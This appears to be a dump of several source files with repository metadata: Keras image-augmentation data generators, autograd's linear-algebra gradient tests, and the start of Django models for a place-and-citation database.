0, self.images.shape[1] - self.output_y, size=self.batch_size
)
if self.flip_x:
self.x_flips = np.random.choice(
[False, True], size=self.batch_size
)
if self.flip_y:
self.y_flips = np.random.choice(
[False, True], size=self.batch_size
)
if self.rotate:
self.n_rotations = np.random.choice(
[0, 1, 2, 3], size=self.batch_size
)
if self.rescale_brightness is not None:
self.amt_to_scale = np.random.uniform(
low=self.rescale_brightness[0],
high=self.rescale_brightness[1],
size=self.batch_size
)
if self.zoom_range is not None:
if (1-self.zoom_range)*self.images.shape[1] < self.output_y:
self.zoom_range = self.output_y/self.images.shape[1]
if (1-self.zoom_range)*self.images.shape[2] < self.output_x:
self.zoom_range = self.output_x/self.images.shape[2]
self.zoom_amt_y = np.random.uniform(
low=1-self.zoom_range,
high=1+self.zoom_range,
size=self.batch_size
)
self.zoom_amt_x = np.random.uniform(
low=1-self.zoom_range,
high=1+self.zoom_range,
size=self.batch_size
)
def _data_generation(self, image_idxs):
# initialize
X = np.empty((self.batch_size, self.output_y, self.output_x,
self.images.shape[3]))
y = np.empty((self.batch_size, self.output_y, self.output_x,
self.masks.shape[3]))
for i in range(self.batch_size):
curr_im = self.images[image_idxs[i], :, :, :]
curr_mask = self.masks[image_idxs[i], :, :, :]
if self.zoom_range is not None:
curr_im = cv2.resize(
curr_im,
(int(curr_im.shape[1]*self.zoom_amt_x[i]),
int(curr_im.shape[0]*self.zoom_amt_y[i])))
curr_mask = cv2.resize(
curr_mask.astype('uint8'),
(int(curr_mask.shape[1]*self.zoom_amt_x[i]),
int(curr_mask.shape[0]*self.zoom_amt_y[i])))
if len(curr_mask.shape) < 3: # add third axis if absent
curr_mask = curr_mask[:, :, np.newaxis]
curr_mask = curr_mask > 0
pad_amt = [0, 0]
if self.zoom_amt_y[i] < 1:
pad_amt[0] = int(self.images.shape[1]*self.zoom_amt_y[i]*0.5)
if self.zoom_amt_x[i] < 1:
pad_amt[1] = int(self.images.shape[2]*self.zoom_amt_x[i]*0.5)
if pad_amt != [0, 0]:
curr_mask = np.pad(
curr_mask,
pad_width=((pad_amt[0], pad_amt[0]),
(pad_amt[1], pad_amt[1]),
(0, 0)),
mode='reflect')
curr_im = np.pad(
curr_im,
pad_width=((pad_amt[0], pad_amt[0]),
(pad_amt[1], pad_amt[1]),
(0, 0)),
mode='reflect')
if self.crop:
curr_im = curr_im[self.y_mins[i]:self.y_mins[i]+self.output_y,
self.x_mins[i]:self.x_mins[i]+self.output_x,
:]
curr_mask = curr_mask[
self.y_mins[i]:self.y_mins[i]+self.output_y,
self.x_mins[i]:self.x_mins[i]+self.output_x,
:]
else:
curr_im = cv2.resize(curr_im, (self.output_y, self.output_x,
self.images.shape[2]))
curr_mask = cv2.resize(curr_im, (self.output_y, self.output_x,
self.masks.shape[2]))
if self.flip_x:
if self.x_flips[i]:
curr_im = np.flip(curr_im, axis=0)
curr_mask = np.flip(curr_mask, axis=0)
if self.flip_y:
if self.y_flips[i]:
curr_im = np.flip(curr_im, axis=1)
curr_mask = np.flip(curr_mask, axis=1)
if self.rotate:
to_go = 0
while to_go < self.n_rotations[i]:
curr_im = np.rot90(curr_im)
curr_mask = np.rot90(curr_mask)
to_go += 1
if self.rescale_brightness is not None:
hsv = cv2.cvtColor(curr_im, cv2.COLOR_BGR2HSV)
v = hsv[:, :, 2]*self.amt_to_scale[i]
v = np.clip(v, 0, 255).astype('uint8')
hsv[:, :, 2] = v
curr_im = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
X[i, :, :, :] = curr_im
y[i, :, :, :] = curr_mask
X = X/255.
return X, y
def __len__(self):
'Denotes the number of batches per epoch'
return int(np.floor(self.images.shape[1]/self.batch_size))
def __getitem__(self, index):
'Generate one batch of data'
# Generate indexes of the batch
im_inds = self.image_indexes[index*self.batch_size:(index+1)*self.batch_size]
# Generate data
X, y = self._data_generation(image_idxs=im_inds)
if self.output_dir:
np.save(os.path.join(
self.output_dir, 'images_{}.npy'.format(self.output_ctr)),
X)
np.save(os.path.join(
self.output_dir, 'masks_{}.npy'.format(self.output_ctr)),
y)
self.output_ctr += 1
return X, y
class FileDataGenerator(keras.utils.Sequence):
def __init__(self, image_paths, mask_path, image_shape,
traverse_subdirs=False, chip_subset=[], batch_size=32,
crop=False, output_x=256, output_y=256, shuffle=True,
flip_x=False, flip_y=False, zoom_range=None,
rotate=False, rescale_brightness=None, output_dir=''):
self.traverse_subdirs = traverse_subdirs
self.mask_path = mask_path
self.mask_list = [f for f in os.listdir(mask_path)
if f.endswith('.tif')]
self.image_list = image_paths
if chip_subset:
# subset the raw mask and image lists based on a list of chips
# provided as chip_subset
self.image_list = [f for f in self.image_list if any(
chip in f for chip in chip_subset
)]
self.mask_list = [os.path.join(self.mask_path, f)
for f in self.mask_list if any(
chip in f for chip in chip_subset
)]
self.image_shape = image_shape
self.batch_size = batch_size
self.n_batches = int(np.floor(len(self.image_list) /
self.batch_size))
self.output_x = output_x
self.output_y = output_y
self.crop = crop
self.shuffle = shuffle
self.flip_x = flip_x
self.flip_y = flip_y
self.rotate = rotate
self.zoom_range = zoom_range
self.output_dir = output_dir
self.output_ctr = 0
self.rescale_brightness = rescale_brightness
self.on_epoch_end()
def on_epoch_end(self):
'Update indices, rotations, etc. after each epoch'
# reorder images
self.image_indexes = np.arange(len(self.image_list))
if self.shuffle:
np.random.shuffle(self.image_indexes)
if self.crop:
self.x_mins = np.random.randint(
0, self.image_shape[1]-self.output_x, size=self.batch_size
)
self.y_mins = np.random.randint(
0, self.image_shape[0] - self.output_y, size=self.batch_size
)
if self.flip_x:
self.x_flips = np.random.choice(
[False, True], size=self.batch_size
)
if self.flip_y:
self.y_flips = np.random.choice(
[False, True], size=self.batch_size
)
if self.rotate:
self.n_rotations = np.random.choice(
[0, 1, 2, 3], size=self.batch_size
)
if self.rescale_brightness is not None:
self.amt_to_scale = np.random.uniform(
low=self.rescale_brightness[0],
high=self.rescale_brightness[1],
size=self.batch_size
)
if self.zoom_range is not None:
if (1-self.zoom_range)*self.image_shape[0] < self.output_y:
self.zoom_range = self.output_y/self.image_shape[0]
if (1-self.zoom_range)*self.image_shape[1] < self.output_x:
self.zoom_range = self.output_x/self.image_shape[1]
self.zoom_amt_y = np.random.uniform(
low=1-self.zoom_range,
high=1+self.zoom_range,
size=self.batch_size
)
self.zoom_amt_x = np.random.uniform(
low=1-self.zoom_range,
high=1+self.zoom_range,
size=self.batch_size
)
def _data_generation(self, image_idxs):
# initialize
X = np.empty((self.batch_size, self.output_y, self.output_x,
self.image_shape[2]))
# TODO: IMPLEMENT MULTI-CHANNEL MASK FUNCTIONALITY
y = np.empty((self.batch_size, self.output_y, self.output_x, 1))
for i in range(self.batch_size):
im_path = self.image_list[image_idxs[i]]
# TODO: IMPLEMENT BETTER REGEX-BASED CHIP ID SEARCHING
if im_path.endswith('_image.tif'):
chip_id = '_'.join(im_path.rstrip('_image.tif').split('_')[-2:])
else:
chip_id = '_'.join(im_path.rstrip('.tif').split('_')[-2:])
mask_path = [f for f in self.mask_list if chip_id in f][0]
im_arr = cv2.imread(im_path, cv2.IMREAD_COLOR)
mask_arr = cv2.imread(mask_path, cv2.IMREAD_GRAYSCALE)
mask_arr = mask_arr[:, :, np.newaxis] > 0
if self.zoom_range is not None:
im_arr = cv2.resize(
im_arr,
(int(im_arr.shape[1]*self.zoom_amt_x[i]),
int(im_arr.shape[0]*self.zoom_amt_y[i])))
mask_arr = cv2.resize(
mask_arr.astype('uint8'),
(int(mask_arr.shape[1]*self.zoom_amt_x[i]),
int(mask_arr.shape[0]*self.zoom_amt_y[i])))
if len(mask_arr.shape) < 3: # add third axis if absent
mask_arr = mask_arr[:, :, np.newaxis]
mask_arr = mask_arr > 0
pad_amt = [0, 0]
if self.zoom_amt_y[i] < 1:
pad_amt[0] = int(self.image_shape[0] *
self.zoom_amt_y[i]*0.5)
if self.zoom_amt_x[i] < 1:
pad_amt[1] = int(self.image_shape[1] *
self.zoom_amt_x[i]*0.5)
if pad_amt != [0, 0]:
mask_arr = np.pad(
mask_arr,
pad_width=((pad_amt[0], pad_amt[0]),
(pad_amt[1], pad_amt[1]),
(0, 0)),
mode='reflect')
im_arr = np.pad(
im_arr,
pad_width=((pad_amt[0], pad_amt[0]),
(pad_amt[1], pad_amt[1]),
(0, 0)),
mode='reflect')
if self.crop:
im_arr = im_arr[self.y_mins[i]:self.y_mins[i]+self.output_y,
self.x_mins[i]:self.x_mins[i]+self.output_x,
:]
mask_arr = mask_arr[
self.y_mins[i]:self.y_mins[i]+self.output_y,
self.x_mins[i]:self.x_mins[i]+self.output_x,
:]
else:
im_arr = cv2.resize(im_arr, (self.output_y, self.output_x,
self.image_shape[2]))
mask_arr = cv2.resize(im_arr, (self.output_y, self.output_x,
1))
if self.flip_x:
if self.x_flips[i]:
im_arr = np.flip(im_arr, axis=0)
mask_arr = np.flip(mask_arr, axis=0)
if self.flip_y:
if self.y_flips[i]:
im_arr = np.flip(im_arr, axis=1)
mask_arr = np.flip(mask_arr, axis=1)
if self.rotate:
to_go = 0
while to_go < self.n_rotations[i]:
im_arr = np.rot90(im_arr)
mask_arr = np.rot90(mask_arr)
to_go += 1
if self.rescale_brightness is not None:
hsv = cv2.cvtColor(im_arr, cv2.COLOR_BGR2HSV)
v = hsv[:, :, 2]*self.amt_to_scale[i]
v = np.clip(v, 0, 255).astype('uint8')
hsv[:, :, 2] = v
im_arr = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
X[i, :, :, :] = im_arr
y[i, :, :, :] = mask_arr
X = X/255.
return X, y
def __len__(self):
'Denotes the number of batches per epoch'
return self.n_batches
def __getitem__(self, index):
'Generate one batch of data'
# Generate indexes of the batch
im_inds = self.image_indexes[index*self.batch_size:
(index+1)*self.batch_size]
# Generate data
X, y = self._data_generation(image_idxs=im_inds)
if self.output_dir:
np.save(os.path.join(
self.output_dir, 'images_{}.npy'.format(self.output_ctr)),
X)
np.save(os.path.join(
self.output_dir, 'masks_{}.npy'.format(self.output_ctr)),
y)
self.output_ctr += 1
return X, y
def get_files_recursively(image_path, traverse_subdirs=False):
"""Get files from subdirs of `path`, joining them to the dir."""
if traverse_subdirs:
walker = os.walk(image_path)
im_path_list = []
for step in walker:
if not step[2]: # if there are no files in the current dir
continue
im_path_list += [os.path.join(step[0], fname)
for fname in step[2] if
fname.endswith('.tif')]
return im_path_list
else:
return [os.path.join(image_path, f) for f in os.listdir(image_path)
if f.endswith('.tif')]
| 43.151943
| 88
| 0.500778
| 3,122
| 24,424
| 3.680333
| 0.059257
| 0.073107
| 0.053177
| 0.035509
| 0.878938
| 0.87215
| 0.855178
| 0.841688
| 0.824717
| 0.812707
| 0
| 0.021317
| 0.391132
| 24,424
| 565
| 89
| 43.228319
| 0.751328
| 0.045242
| 0
| 0.729885
| 0
| 0
| 0.022259
| 0
| 0
| 0
| 0
| 0.00177
| 0
| 1
| 0.030651
| false
| 0
| 0.007663
| 0
| 0.065134
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83fce9b590b279d89046da70539238fa2a1e26ad
| 11,108
|
py
|
Python
|
auto_gradient/tests/test_linalg.py
|
juliaprocess/ml_libs
|
52cac5d64b55a12dfbdad1c768cdd8d79d5789f5
|
[
"MIT"
] | 4
|
2021-01-12T22:02:57.000Z
|
2021-04-02T15:24:18.000Z
|
tests/test_linalg.py
|
RInterested/autograd
|
a2c8d44c686ceafb697c0a51efa374cd643d9d6b
|
[
"MIT"
] | null | null | null |
tests/test_linalg.py
|
RInterested/autograd
|
a2c8d44c686ceafb697c0a51efa374cd643d9d6b
|
[
"MIT"
] | 1
|
2017-07-30T23:49:27.000Z
|
2017-07-30T23:49:27.000Z
|
from __future__ import absolute_import
import itertools
import autograd.numpy as np
import autograd.numpy.random as npr
import autograd.scipy.linalg as spla
from autograd.util import *
from autograd import grad
from builtins import range
from functools import partial
npr.seed(1)
def check_symmetric_matrix_grads(fun, *args):
def symmetrize(A):
L = np.tril(A)
return (L + T(L))/2.
new_fun = lambda *args: fun(symmetrize(args[0]), *args[1:])
return check_grads(new_fun, *args)
T = lambda A : np.swapaxes(A, -1, -2)
def rand_psd(D):
mat = npr.randn(D,D)
return np.dot(mat, mat.T)
def test_inv():
def fun(x): return to_scalar(np.linalg.inv(x))
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 8
mat = npr.randn(D, D)
mat = np.dot(mat, mat) + 1.0 * np.eye(D)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_inv_3d():
fun = lambda x: to_scalar(np.linalg.inv(x))
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 4
mat = npr.randn(D, D, D) + 5*np.eye(D)
check_grads(fun, mat)
check_grads(d_fun, mat)
mat = npr.randn(D, D, D, D) + 5*np.eye(D)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_solve_arg1():
D = 8
A = npr.randn(D, D) + 10.0 * np.eye(D)
B = npr.randn(D, D - 1)
def fun(a): return to_scalar(np.linalg.solve(a, B))
d_fun = lambda x : to_scalar(grad(fun)(x))
check_grads(fun, A)
check_grads(d_fun, A)
def test_solve_arg1_1d():
D = 8
A = npr.randn(D, D) + 10.0 * np.eye(D)
B = npr.randn(D)
def fun(a): return to_scalar(np.linalg.solve(a, B))
d_fun = lambda x : to_scalar(grad(fun)(x))
check_grads(fun, A)
check_grads(d_fun, A)
def test_solve_arg2():
D = 6
A = npr.randn(D, D) + 1.0 * np.eye(D)
B = npr.randn(D, D - 1)
def fun(b): return to_scalar(np.linalg.solve(A, b))
d_fun = lambda x : to_scalar(grad(fun)(x))
check_grads(fun, B)
check_grads(d_fun, B)
def test_solve_arg1_3d():
D = 4
A = npr.randn(D+1, D, D) + 5*np.eye(D)
B = npr.randn(D+1, D)
fun = lambda A: to_scalar(np.linalg.solve(A, B))
d_fun = lambda A: to_scalar(grad(fun)(A))
check_grads(fun, A)
check_grads(d_fun, A)
def test_solve_arg1_3d_3d():
D = 4
A = npr.randn(D+1, D, D) + 5*np.eye(D)
B = npr.randn(D+1, D, D+2)
fun = lambda A: to_scalar(np.linalg.solve(A, B))
d_fun = lambda A: to_scalar(grad(fun)(A))
check_grads(fun, A)
check_grads(d_fun, A)
def test_det():
def fun(x): return np.linalg.det(x)
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_det_3d():
fun = lambda x: to_scalar(np.linalg.det(x))
d_fun = lambda x: to_scalar(grad(fun)(x))
D = 3
mat = npr.randn(D, D, D)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_slogdet():
def fun(x):
sign, logdet = np.linalg.slogdet(x)
return logdet
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D)
check_grads(fun, mat)
check_grads(fun, -mat)
check_grads(d_fun, mat)
def test_slogdet_3d():
fun = lambda x: np.sum(np.linalg.slogdet(x)[1])
d_fun = lambda x: to_scalar(grad(fun)(x))
mat = np.concatenate([(rand_psd(5) + 5*np.eye(5))[None,...] for _ in range(3)])
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_vector_2norm():
def fun(x): return to_scalar(np.linalg.norm(x))
d_fun = lambda x: to_scalar(grad(fun)(x))
D = 6
vec = npr.randn(D)
check_grads(fun, vec)
check_grads(d_fun, vec)
def test_frobenius_norm():
def fun(x): return to_scalar(np.linalg.norm(x))
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D-1)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_frobenius_norm_axis():
def fun(x): return to_scalar(np.linalg.norm(x, axis=(0, 1)))
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D-1, D-2)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_vector_norm_ord():
def helper(size, ord):
def fun(x): return np.linalg.norm(x, ord=ord)
vec = npr.randn(size)
check_grads(fun, vec)
for ord in range(2,5):
yield helper, 6, ord
def test_norm_axis():
def helper(shape, axis):
def fun(x): return to_scalar(np.linalg.norm(x, axis=axis))
arr = npr.randn(*shape)
check_grads(fun, arr)
for axis in range(3):
yield helper, (6,5,4), axis
def test_norm_nuclear():
def fun(x): return to_scalar(np.linalg.norm(x, ord='nuc'))
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D-1)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_norm_nuclear_axis():
def fun(x): return to_scalar(np.linalg.norm(x, ord='nuc', axis=(0, 1)))
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D-1, D-2)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_eigvalh_lower():
def fun(x):
w, v = np.linalg.eigh(x)
return to_scalar(w) + to_scalar(v)
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D)
hmat = np.dot(mat.T, mat)
check_symmetric_matrix_grads(fun, hmat)
check_symmetric_matrix_grads(d_fun, hmat)
def test_eigvalh_upper():
def fun(x):
w, v = np.linalg.eigh(x, 'U')
return to_scalar(w) + to_scalar(v)
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(D, D)
hmat = np.dot(mat.T, mat)
check_symmetric_matrix_grads(fun, hmat)
check_symmetric_matrix_grads(d_fun, hmat)
broadcast_dot_transpose = partial(np.einsum, '...ij,...kj->...ik')
def test_eigvalh_lower_broadcasting():
def fun(x):
w, v = np.linalg.eigh(x)
return to_scalar(w) + to_scalar(v)
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(2, 3, D, D) + 10 * np.eye(D)[None,None,...]
hmat = broadcast_dot_transpose(mat, mat)
check_symmetric_matrix_grads(fun, hmat)
check_symmetric_matrix_grads(d_fun, hmat)
def test_eigvalh_upper_broadcasting():
def fun(x):
w, v = np.linalg.eigh(x, 'U')
return to_scalar(w) + to_scalar(v)
d_fun = lambda x : to_scalar(grad(fun)(x))
D = 6
mat = npr.randn(2, 3, D, D) + 10 * np.eye(D)[None,None,...]
hmat = broadcast_dot_transpose(mat, mat)
check_symmetric_matrix_grads(fun, hmat)
check_symmetric_matrix_grads(d_fun, hmat)
def test_cholesky():
fun = lambda A: to_scalar(np.linalg.cholesky(A))
fun2 = lambda A: to_scalar(grad(fun)(A))
check_symmetric_matrix_grads(fun, rand_psd(6))
check_symmetric_matrix_grads(fun2, rand_psd(6))
def test_cholesky_broadcast():
fun = lambda A: to_scalar(np.linalg.cholesky(A))
fun2 = lambda A: to_scalar(grad(fun)(A))
A = np.concatenate([rand_psd(6)[None, :, :] for i in range(3)], axis=0)
check_symmetric_matrix_grads(fun, A)
check_symmetric_matrix_grads(fun2, A)
def test_cholesky_reparameterization_trick():
def fun(A):
rng = np.random.RandomState(0)
z = np.dot(np.linalg.cholesky(A), rng.randn(A.shape[0]))
return np.linalg.norm(z)
check_symmetric_matrix_grads(fun, rand_psd(6))
def test_sqrtm():
def fun(A):
return to_scalar(spla.sqrtm(A))
check_symmetric_matrix_grads(fun, rand_psd(6))
def test_solve_triangular_arg1():
D = 6
b = npr.randn(D)
trans_options = ['T', 'N', 'C', 0, 1, 2]
lower_options = [True, False]
for trans, lower in itertools.product(trans_options, lower_options):
def fun(A):
return to_scalar(spla.solve_triangular(A, b, trans=trans, lower=lower))
yield check_grads, fun, npr.randn(D, D) + 10*np.eye(D)
def test_solve_triangular_arg2_1d():
D = 6
A = npr.randn(D, D) + 10*np.eye(D)
trans_options = ['T', 'N', 'C', 0, 1, 2]
lower_options = [True, False]
for trans, lower in itertools.product(trans_options, lower_options):
def fun(b):
return to_scalar(spla.solve_triangular(A, b, trans=trans, lower=lower))
yield check_grads, fun, npr.randn(D)
def test_solve_triangular_arg2_2d():
D = 6
A = npr.randn(D, D) + 10*np.eye(D)
trans_options = ['T', 'N', 'C', 0, 1, 2]
lower_options = [True, False]
for trans, lower in itertools.product(trans_options, lower_options):
def fun(B):
return to_scalar(spla.solve_triangular(A, B, trans=trans, lower=lower))
yield check_grads, fun, npr.randn(D, D-1)
def test_svd_wide_2d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
m = 3
n = 5
mat = npr.randn(m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_wide_3d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
k = 4
m = 3
n = 5
mat = npr.randn(k, m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_square_2d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
m = 4
n = 4
mat = npr.randn(m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_square_3d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
k = 3
m = 4
n = 4
mat = npr.randn(k, m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_tall_2d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
m = 5
n = 3
mat = npr.randn(m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_tall_3d():
def fun(x):
u, s, v = np.linalg.svd(x, full_matrices=False)
return to_scalar(u) + to_scalar(s) + to_scalar(v)
def d_fun(x):
return to_scalar(grad(fun)(x))
k = 4
m = 5
n = 3
mat = npr.randn(k, m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_only_s_2d():
def fun(x):
s = np.linalg.svd(x, full_matrices=False, compute_uv=False)
return to_scalar(s)
def d_fun(x):
return to_scalar(grad(fun)(x))
m = 5
n = 3
mat = npr.randn(m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
def test_svd_only_s_3d():
def fun(x):
s = np.linalg.svd(x, full_matrices=False, compute_uv=False)
return to_scalar(s)
def d_fun(x):
return to_scalar(grad(fun)(x))
k = 4
m = 5
n = 3
mat = npr.randn(k, m, n)
check_grads(fun, mat)
check_grads(d_fun, mat)
| 28.409207
| 83
| 0.614152
| 1,952
| 11,108
| 3.301742
| 0.067623
| 0.096819
| 0.073856
| 0.069822
| 0.813189
| 0.788984
| 0.764779
| 0.756711
| 0.748487
| 0.742746
| 0
| 0.018156
| 0.236406
| 11,108
| 390
| 84
| 28.482051
| 0.741688
| 0
| 0
| 0.674556
| 0
| 0
| 0.003151
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.236686
| false
| 0
| 0.026627
| 0.071006
| 0.349112
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8601661d78512c24f8fb94c9f762a53e82945b70
| 46,100
|
py
|
Python
|
docs/Data/models_new_fk.py
|
Ecotrust/TEKDB
|
c92500aa9c8271398721bf069b93d63d11510529
|
[
"MIT"
] | 4
|
2017-12-26T05:43:52.000Z
|
2022-01-07T02:54:41.000Z
|
docs/Data/models_new_fk.py
|
Ecotrust/TEKDB
|
c92500aa9c8271398721bf069b93d63d11510529
|
[
"MIT"
] | 134
|
2017-02-13T23:26:26.000Z
|
2020-09-24T23:13:02.000Z
|
docs/Data/models_new_fk.py
|
Ecotrust/TEKDB
|
c92500aa9c8271398721bf069b93d63d11510529
|
[
"MIT"
] | 2
|
2018-03-02T04:01:16.000Z
|
2019-11-06T01:51:49.000Z
|
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
#
# Also note: You'll have to insert the output of 'django-admin sqlcustom [app_label]'
# into your database.
from __future__ import unicode_literals
from django.db import models
class Citations(models.Model):
citationid = models.ForeignKey('Placescitationevents', db_column='CitationID', primary_key=True) # Field name made lowercase.
referencetype = models.CharField(db_column='ReferenceType', max_length=255, blank=True, null=True) # Field name made lowercase.
referencetext = models.CharField(db_column='ReferenceText', max_length=50, blank=True, null=True) # Field name made lowercase.
authortype = models.CharField(db_column='AuthorType', max_length=255, blank=True, null=True) # Field name made lowercase.
authorprimary = models.CharField(db_column='AuthorPrimary', max_length=255, blank=True, null=True) # Field name made lowercase.
authorsecondary = models.CharField(db_column='AuthorSecondary', max_length=255, blank=True, null=True) # Field name made lowercase.
intervieweeid = models.IntegerField(db_column='IntervieweeID', blank=True, null=True) # Field name made lowercase.
interviewerid = models.IntegerField(db_column='InterviewerID', blank=True, null=True) # Field name made lowercase.
placeofinterview = models.CharField(db_column='PlaceofInterview', max_length=255, blank=True, null=True) # Field name made lowercase.
year = models.IntegerField(db_column='Year', blank=True, null=True) # Field name made lowercase.
title = models.TextField(db_column='Title', blank=True, null=True) # Field name made lowercase.
seriestitle = models.CharField(db_column='SeriesTitle', max_length=255, blank=True, null=True) # Field name made lowercase.
seriesvolume = models.CharField(db_column='SeriesVolume', max_length=50, blank=True, null=True) # Field name made lowercase.
serieseditor = models.CharField(db_column='SeriesEditor', max_length=255, blank=True, null=True) # Field name made lowercase.
publisher = models.CharField(db_column='Publisher', max_length=100, blank=True, null=True) # Field name made lowercase.
publishercity = models.CharField(db_column='PublisherCity', max_length=255, blank=True, null=True) # Field name made lowercase.
preparedfor = models.CharField(db_column='PreparedFor', max_length=100, blank=True, null=True) # Field name made lowercase.
comments = models.TextField(db_column='Comments', blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'citations'
class Currentversion(models.Model):
id = models.IntegerField(db_column='ID', primary_key=True) # Field name made lowercase.
backendversion = models.IntegerField(db_column='BackendVersion', blank=True, null=True) # Field name made lowercase.
frontendversion = models.IntegerField(db_column='FrontendVersion', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'currentversion'
class Locality(models.Model):
localityid = models.IntegerField(db_column='LocalityID', primary_key=True) # Field name made lowercase.
placeid = models.ForeignKey('Places', db_column='PlaceID', blank=True, null=True) # Field name made lowercase.
englishname = models.CharField(db_column='EnglishName', max_length=255, blank=True, null=True) # Field name made lowercase.
indigenousname = models.CharField(db_column='IndigenousName', max_length=255, blank=True, null=True) # Field name made lowercase.
localitytype = models.CharField(db_column='LocalityType', max_length=255, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'locality'
class Localitygisselections(models.Model):
localityid = models.IntegerField(db_column='LocalityID', blank=True, null=True) # Field name made lowercase.
localitylabel = models.CharField(db_column='LocalityLabel', max_length=255, blank=True, null=True) # Field name made lowercase.
sourcefc = models.CharField(db_column='SourceFC', max_length=255, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'localitygisselections'
class Localityplaceresourceevent(models.Model):
placeresourceid = models.ForeignKey('Placesresourceevents', db_column='PlaceResourceID') # Field name made lowercase.
localityid = models.ForeignKey(Locality, db_column='LocalityID') # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
